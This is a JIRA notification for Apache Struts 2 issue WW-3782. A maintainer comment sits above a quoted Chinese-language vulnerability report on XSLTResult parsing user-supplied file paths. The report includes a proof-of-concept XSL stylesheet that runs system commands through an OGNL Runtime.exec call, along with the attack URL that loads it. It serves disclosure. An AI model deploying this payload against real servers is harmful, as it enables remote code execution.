[jira] [Commented] (WW-3782) struts2框架XSLTResult本地文件代码执行漏洞

[Lukasz Lenart (Commented) (JIRA)]

    [ 
https://issues.apache.org/jira/browse/WW-3782?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel&focusedCommentId=13235436#comment-13235436
 ] 

Lukasz Lenart commented on WW-3782:
-----------------------------------

You mean, that your applications is taking a user file and uses it as an input 
for XSTL Result ? Without checking content of the file ? XSLT Result was 
designed to base on server side files and not to use any file uploaded by 
accidental user.

It's exactly the same case when you aren't escaping input form parameters and 
use them directly in your SQL queries - it's called SQL injection.
                
> struts2框架XSLTResult本地文件代码执行漏洞
> -----------------------------
>
>                 Key: WW-3782
>                 URL: https://issues.apache.org/jira/browse/WW-3782
>             Project: Struts 2
>          Issue Type: Bug
>          Components: Core Actions
>    Affects Versions: 2.3.1.2
>            Reporter: kxlzx
>            Priority: Critical
>              Labels: patch
>         Attachments: struts.jpg
>
>
> http://www.inbreak.net/archives/319
> Reporter : kxlzx , Alibaba Security Team
> http://www.inbreak.net/
> struts2允许action有多种返回类型，其中包括XSLT类型，这种类型允许接受用户提交一个文件地址，并且去解析它为XSLT文件，无论扩展名是什么。
>  这是XSLTResult文件代码：
> http://svn.apache.org/repos/asf/struts/struts2/trunk/core/src/main/java/org/apache/struts2/views/xslt/XSLTResult.java
> //获取用户提交的"xslt.location"的值
> String pathFromRequest = 
> ServletActionContext.getRequest().getParameter("xslt.location");
> path = pathFromRequest;
> URL resource = ServletActionContext.getServletContext().getResource(path);
> //解析用户提交的文件地址为xslt
> templates = factory.newTemplates(new StreamSource(resource.openStream()));
> 这段代码导致项目中只要有任何一个action使用了xsltResult，攻击者就可以让应用将解析攻击者上传的文件作xslt解析。
> 示例一个使用了xsltResult的action：
> <action name="xslt" class="net.inbreak.xsltAction">
>    <result type="xslt"/>
> </action>
> XSLT解析，允许执行java静态方法，所以，攻击者只要上传一个文件在服务器上
> 例如：
> /upload/7758521.gif
> <?xml version="1.0" encoding="UTF-8" ?>
> <xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform";
>                version="1.0" xmlns:ognl="ognl.Ognl">
>       <xsl:template match="/">
>               <html> 
>                       <body> 
>                          <h2>hacked by kxlzx</h2> 
>                          <h2>http://www.inbreak.net</h2> 
>                          <exp>
>                                        <xsl:value-of 
> select="ognl:getValue('@Runtime@getRuntime().exec(&quot;calc&quot;)', '')"/>
>                               </exp>
>                       </body> 
>               </html> 
>       </xsl:template> 
> </xsl:stylesheet>
> 这个xsl文件解析时，会调用ognl中的
> ognl:getValue('@Runtime@getRuntime().exec("calc")', '')
> 导致执行任意代码。
> 一个xslt的返回action地址为
>  
> http://www.inbreak.net/xslt.action
>  
> 那么，攻击者就可以提交
>  
> http://www.inbreak.net/xslt.action?xslt.location=upload/7758521.gif
> 就会变成
> !https://issues.apache.org/jira/secure/attachment/12519392/struts.jpg!

--
This message is automatically generated by JIRA.
If you think it was sent incorrectly, please contact your JIRA administrators: 
https://issues.apache.org/jira/secure/ContactAdministrators!default.jspa
For more information on JIRA, see: http://www.atlassian.com/software/jira